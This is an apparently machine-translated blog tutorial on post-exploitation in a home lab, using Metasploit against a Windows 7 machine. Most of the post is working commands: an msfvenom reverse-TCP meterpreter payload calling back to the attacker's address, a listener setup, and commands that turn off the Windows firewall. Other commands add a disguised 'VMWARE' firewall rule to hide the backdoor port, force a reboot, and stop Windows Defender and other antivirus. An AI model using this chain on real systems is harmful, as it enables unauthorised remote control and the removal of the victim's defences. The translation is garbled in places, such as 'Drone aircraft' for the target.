当前位置:网站首页>Intranet information collection of Intranet penetration (I)
Intranet information collection of Intranet penetration (I)
2022-07-06 14:07:00 【Unknown white hat】
Catalog
Metasploit Intranet information collection
03 adopt shell Turn off firewall
04 Turn off antivirus software
Intranet information collection of Intranet penetration ( Two )_ Unknown white hat blog -CSDN Blog
Metasploit Intranet information collection
attack kali 192.168.0.103
Drone aircraft win7 192.168.0.105
01msf rebound shell
First generate a payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 -f exe > shell.exe
02msf rebound shell
Configure the bounce session handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 4444
exploit
take payload Send it to the target machine to execute
Successful implementation
linux Can't recognize window Chinese characters can be garbled , Modify the code page (65001 It stands for UTF-8)
03 adopt shell Turn off firewall
shell(execute -f cmd -i -H)
netsh advfirewall set allprofiles state off ( Turn off firewall )
netsh advfirewall show allprofiles ( Check the firewall status )
Add firewall rules through policies to hide behaviors
netsh advfirewall set add rule name= "VMWARE" protocol=TCP dir=in localport=4444 action=allow
netsh firewall add portopening TCP 4444 "VMWARE" ENABLE ALL
Restart and take effect ( Make win7 restart ):
shutdown -r -f -t 0
04 Turn off antivirus software
close windefend
net stop windefend
Turn off antivirus software
run killav
run post/windows/manage/killav
边栏推荐
- [MySQL table structure and integrity constraint modification (Alter)]
- Mixlab unbounded community white paper officially released
- Safe driving skills on ice and snow roads
- HackMyvm靶机系列(6)-videoclub
- Yugu p1012 spelling +p1019 word Solitaire (string)
- xray與burp聯動 挖掘
- Package bedding of components
- Hackmyvm target series (2) -warrior
- [insert, modify and delete data in the headsong educator data table]
- Build domain environment (win)
猜你喜欢
Interpretation of iterator related "itertools" module usage
7-5 staircase upgrade (PTA program design)
Programme de jeu de cartes - confrontation homme - machine
Xray and burp linkage mining
xray與burp聯動 挖掘
HackMyvm靶机系列(3)-visions
[dark horse morning post] Shanghai Municipal Bureau of supervision responded that Zhong Xue had a high fever and did not melt; Michael admitted that two batches of pure milk were unqualified; Wechat i
1. First knowledge of C language (1)
网络基础之路由详解
撲克牌遊戲程序——人機對抗
随机推荐
Record once, modify password logic vulnerability actual combat
Nuxtjs快速上手(Nuxt2)
【VMware异常问题】问题分析&解决办法
xray与burp联动 挖掘
Experiment 7 use of common classes (correction post)
Get started with typescript
Experiment five categories and objects
Xray and Burp linked Mining
Strengthen basic learning records
HackMyvm靶机系列(1)-webmaster
中间件漏洞复现—apache
Nuxtjs quick start (nuxt2)
小程序web抓包-fiddler
力扣152题乘数最大子数组
简单理解ES6的Promise
Safe driving skills on ice and snow roads
HackMyvm靶机系列(5)-warez
Which is more advantageous in short-term or long-term spot gold investment?
7-3 构造散列表(PTA程序设计)
Detailed explanation of three ways of HTTP caching